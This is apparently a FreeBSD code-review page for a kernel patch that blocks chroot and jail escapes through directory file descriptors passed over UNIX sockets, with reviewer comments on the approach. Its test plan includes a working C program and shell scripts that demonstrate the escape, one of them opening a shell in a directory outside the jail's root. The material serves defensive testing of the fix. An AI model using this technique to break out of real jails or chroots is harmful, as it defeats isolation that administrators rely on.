Page MenuHomeFreeBSD

Verify directory fds against chroot when receiving them through SCM_RIGHTS
Needs ReviewPublic

Authored by firk_cantconnect.ru on Mar 16 2022, 10:28 AM.
This revision needs review, but there are no reviewers specified.

Details

Reviewers
None
Summary

This patch adds a way to verify that some directory vnode is really under some
rootdir. This is needed to allow cross-jail UNIX-socket communication without
giving them a way to escape their chroot using SCM_RIGHTS sent directory fd.

net.local.sendfd_check_root
0 - no checks (old behaviour)
1 - check all SCM_RIGHTS received dirfds for this (default)
2 - also check that received dirfds are accessible to current process
(exec-check) when traversing from /.

Without this check, one jail may receive directory fd from another and traverse outside chroot via ../../

This is another approarch for bug 262179

Test Plan

There is one C source file and two scripts.
test.sh is to verify net.local.sendfd_check_root=1 effect
test2.sh is to verify net.local.sendfd_check_root=2 effect
In both cases it opens a shell with current directory that shouldn't be accessible, and fails when patch applied and sysctl set.

sendfd.c

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <dirent.h>

static int send_fd(int s, int fd) {
  struct iovec iov = {.iov_base = "", .iov_len = 1};
  union {
    char buf[CMSG_SPACE(sizeof(fd))];
    struct cmsghdr align;
  } u;
  struct msghdr msg = {.msg_iov = &iov,
                       .msg_iovlen = 1,
                       .msg_control = u.buf,
                       .msg_controllen = sizeof(u.buf)};

  struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
  *cmsg = (struct cmsghdr){.cmsg_level = SOL_SOCKET,
                           .cmsg_type = SCM_RIGHTS,
                           .cmsg_len = CMSG_LEN(sizeof(fd))};

  bcopy(&fd, CMSG_DATA(cmsg), sizeof(fd));
  return sendmsg(s, &msg, 0);
}

static int recv_fd(int s) {
  int fd;
  char b0[1];
  struct iovec iov;
  struct msghdr msg;
  union {
    char buf[CMSG_SPACE(sizeof(fd))];
    struct cmsghdr align;
  } u;
  struct cmsghdr *cmsg;
  
  bzero(&msg, sizeof(msg));
  iov.iov_base = b0; iov.iov_len = 1;
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;
  msg.msg_control = u.buf;
  msg.msg_controllen = sizeof(u.buf);
  
  if(recvmsg(s, &msg, 0)<0) { fprintf(stderr, "recvmsg() error %d (%s)\n", errno, strerror(errno)); return -1; }
  if(msg.msg_controllen!=sizeof(u.buf)) { fprintf(stderr, "wrong recv\n"); return -1; }

  if(!(cmsg = CMSG_FIRSTHDR(&msg))) { fprintf(stderr, "wrong recv 2\n"); return -1; }

  if(cmsg->cmsg_level!=SOL_SOCKET || cmsg->cmsg_type!=SCM_RIGHTS || cmsg->cmsg_len!=CMSG_LEN(sizeof(fd)))  { fprintf(stderr, "wrong recv 2\n"); return -1; }

  bcopy(CMSG_DATA(cmsg), &fd, sizeof(fd));
  return fd;
}

static int do_listen(char const * spath, char const * fpath) {
  int lfd, afd, fd;
  struct sockaddr_un sa;
  struct stat sb;
  bzero(&sa, sizeof(sa));
  sa.sun_family = AF_UNIX;
  strlcpy(sa.sun_path,spath,sizeof(sa.sun_path));
  if(lstat(spath,&sb)>=0 && S_ISSOCK(sb.st_mode)) unlink(spath);
  if((lfd = socket(PF_UNIX, SOCK_STREAM, 0))<0) { fprintf(stderr, "socket() error %d (%s)\n", errno, strerror(errno)); return -1; }
  if(bind(lfd, (struct sockaddr*)&sa, sizeof(sa))<0) { fprintf(stderr, "bind() error %d (%s)\n", errno, strerror(errno)); return -1; }
  if(listen(lfd, 1)<0) { fprintf(stderr, "listen() error %d (%s)\n", errno, strerror(errno)); return -1; }
  
  if((fd = open(fpath,O_RDONLY))<0) { fprintf(stderr, "open() error %d (%s)\n", errno, strerror(errno)); return -1; }

  fprintf(stderr, "started listening at %s sharing %s\n", spath, fpath);
  while(1) {
    if((afd = accept(lfd, NULL, NULL))<0) { fprintf(stderr, "accept() error %d (%s)\n", errno, strerror(errno)); sleep(1); continue; }
    if(send_fd(afd, fd)<0) fprintf(stderr, "send_fd() error %d (%s)\n", errno, strerror(errno));
    sleep(1);
    close(afd);
  }
}

static int do_connect(char const * spath) {
  int fd;
  struct sockaddr_un sa;
  bzero(&sa, sizeof(sa));
  sa.sun_family = AF_UNIX;
  strcpy(sa.sun_path,spath);
  if((fd = socket(PF_UNIX, SOCK_STREAM, 0))<0) { fprintf(stderr, "socket() error %d (%s)\n", errno, strerror(errno)); return -1; }
  if(connect(fd, (struct sockaddr*)&sa, sizeof(sa))<0) { fprintf(stderr, "connect() error %d (%s)\n", errno, strerror(errno)); return -1; }
  return fd;
}

static int do_read(int fd) {
  char buf[1024];
  int l;
  while((l=read(fd,buf,sizeof(buf)))>0) write(1,buf,l);
  if(l<0) { fprintf(stderr, "read error %d (%s)\n", errno, strerror(errno)); return -1; }
  return 0;
}

static int do_ls(int fd, char const * path) {
  DIR * dp;
  struct dirent * de;
  if(path && (fd=openat(fd,path,O_RDONLY))<0) { fprintf(stderr, "open(%s) error %d (%s)\n", path, errno, strerror(errno)); return -1; }
  if(!(dp=fdopendir(fd))) { fprintf(stderr, "fdopendir error %d (%s)\n", errno, strerror(errno)); return -1; }
  while(errno=0,de=readdir(dp)) {
    printf("%s\n", de->d_name);
  }
  if(errno) { fprintf(stderr, "readdir error %d (%s)\n", errno, strerror(errno)); return -1; }
  return 0;
}


int main(int argc, char * * argv) {
  int fd, rfd;
  if(argc==4 && !strcmp(argv[1],"listen")) return do_listen(argv[2],argv[3]);
  if(argc!=3 || !strcmp(argv[1],"listen")) return -1;
  if((fd = do_connect(argv[2]))<0) return -1;
  if((rfd = recv_fd(fd))<0) return -1;
  fprintf(stderr, "rfd = %d\n", rfd);
  if(!strcmp(argv[1],"read")) do_read(rfd);
  if(!strcmp(argv[1],"ls")) do_ls(rfd,NULL);
  if(!strncmp(argv[1],"ls:",3)) do_ls(rfd,argv[1]+3);
  if(!strcmp(argv[1],"sleep")) while(1) sleep(1);
  if(!strcmp(argv[1],"sh")) {
    if(fchdir(rfd)<0) { fprintf(stderr, "fchdir() error %d (%s)\n", errno, strerror(errno)); return -1; }
    fprintf(stderr, "starting subshell\n");
    system("/bin/sh");
  }
  return 0;
}

test.sh

BASE=`pwd`
cc -o sendfd sendfd.c
mkdir j j/1 j/2
tar -c -f - /bin /lib /libexec | tar -x -f - -C j/1
tar -c -f - /bin /lib /libexec | tar -x -f - -C j/2
cp sendfd j/1/bin
cp sendfd j/2/bin
mkdir j/1/shared j/2/shared
mount -t nullfs "$BASE/j/2/shared" "$BASE/j/1/shared"

jail "$BASE/j/2" x 127.0.0.1 /bin/sendfd listen /shared/2.sock /bin &
sleep 2
jail "$BASE/j/1" x 127.0.0.1 /bin/sendfd sh /shared/2.sock
killall sendfd
umount "$BASE/j/1/shared"

test2.sh (note that $BASE should be world be world-accessible itself)

BASE=`pwd`
cc -o sendfd sendfd.c
mkdir -p 1/2/3
chmod 0 1
./sendfd listen "$BASE/s" "$BASE/1/2" &
sleep 2
chmod 777 "$BASE/s"
su -m nobody -c "$BASE/sendfd sh $BASE/s"
killall sendfd

Diff Detail

Repository
rG FreeBSD src repository
Lint
Lint Skipped
Unit
Unit Tests Skipped

Event Timeline

I'm going to have to sleep on the approach. This is a known escape, but I don't know if the method used can fully plug it. For example it is possible to share file descriptor tables, and one of the processes may not be encumbered by the jail. As is it does solve it for processes which have no way to talk to each other apart from a partially shared fs though.

head/sys/kern/uipc_usrreq.c
163

should be bool

2026

this can't be true at this stage

head/sys/kern/vfs_lookup.c
1523

this routine should utilize a walk similar to vn_fullpath_dir

For example it is possible to share file descriptor tables, and one of the processes may not be encumbered by the jail.

I can't imagine a way how this could lead to gaining unexpected access by jailed process.

And if one jailed process can directly (without shared mountpoint boundaries) walk to the files of other, while not having the same rootdir, things became much worse. As a partial fix, the same check may be added for all dotdot-traversing requests from userspace, but will be still another possible holes.

head/sys/kern/uipc_usrreq.c
163

There are three possible values: 0 = no checks, 1 = chroot check, 2 = chroot + absolute path access check.

head/sys/kern/vfs_lookup.c
1523

But vn_fullpath_dir doing a lot of extra work: it opens each traversed vnode for reading and scanning it for child (previously seen) directory name (see vop_stdvptocnp()), which is completely unneeded here. I see no way to avoid this without huge refactoring, because vop_stdvptocnp() is a part of VOP api. Instead I've done the walk based on vfs_lookup(), simulating the path like "../../../../". What's wrong with it?